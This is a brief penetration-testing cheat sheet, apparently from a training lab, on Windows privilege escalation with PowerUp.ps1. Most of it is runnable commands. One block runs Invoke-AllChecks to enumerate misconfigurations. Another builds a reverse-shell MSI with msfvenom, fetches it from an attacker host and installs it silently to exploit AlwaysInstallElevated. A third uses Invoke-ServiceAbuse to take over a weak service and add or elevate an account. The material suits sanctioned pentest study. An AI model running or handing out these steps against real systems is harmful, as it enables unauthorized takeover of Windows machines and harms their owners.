Windows PrivEsc Checks with PowerUp.ps1
privescwindowstool
Summary
Run PowerUp's Invoke-AllChecks to find privesc paths; abuse AlwaysInstallElevated with a malicious MSI or weak services with Invoke-ServiceAbuse.
Walkthrough
PowerUp enumerates common Windows privilege-escalation misconfigurations and provides functions to abuse them.
Steps
- Import the script and run
Invoke-AllChecksto enumerate weak services, unquoted paths, and registry misconfigurations. - AlwaysInstallElevated: if this policy is set, build a malicious MSI with msfvenom and run it with
msiexec /quiet /qn /i reverse.msito execute as a high-privileged account (catch the shell on your listener). - Service abuse: use
Invoke-ServiceAbuse -Name '<service>' -UserName '<DOMAIN>\<user>'to leverage a modifiable service into adding/elevating an account.
Commands
powershell
wget PowerUp.ps1 -o PowerUp.ps1 . .\PowerUp.ps1 Invoke-AllChecks
bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=443 -f msi -o reverse.msi
powershell
wget -useb http://<IP>/reverse.msi -o reverse.msi msiexec /quiet /qn /i reverse.msi
powershell
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<TARGET>\studentx' -Verbose